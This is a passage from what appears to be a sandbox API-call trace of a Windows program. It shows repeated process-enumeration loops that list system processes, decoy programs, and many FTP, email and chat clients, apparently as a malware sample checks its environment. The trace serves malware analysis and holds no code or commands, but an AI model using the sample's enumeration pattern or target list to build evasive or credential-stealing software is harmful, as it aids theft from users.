lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0198.926] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0198.928] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0198.930] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0198.932] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0198.938] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0198.939] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0198.941] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0198.943] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.944] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.946] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0198.948] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0198.952] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0198.953] CloseHandle (hObject=0x2274) returned 1 [0198.953] Sleep (dwMilliseconds=0x64) [0199.060] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0199.070] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.072] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.074] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.079] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.080] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.082] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.084] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.086] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.087] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.089] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.094] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.095] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.097] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.098] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.100] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.108] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.110] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.111] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.113] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.114] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0199.116] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0199.117] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0199.119] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.123] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.125] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0199.127] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0199.128] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0199.130] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0199.132] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.133] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0199.135] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0199.140] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.142] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0199.145] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0199.147] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0199.149] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0199.189] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0199.192] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0199.194] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0199.197] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0199.202] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0199.203] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0199.205] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0199.207] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0199.209] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0199.210] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0199.212] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0199.216] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0199.218] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0199.219] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0199.221] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0199.223] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0199.224] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0199.226] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0199.227] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0199.272] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0199.297] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0199.299] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0199.301] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0199.302] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0199.304] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0199.306] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0199.311] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0199.314] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0199.317] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0199.319] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0199.321] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0199.322] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0199.327] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0199.329] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0199.332] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, 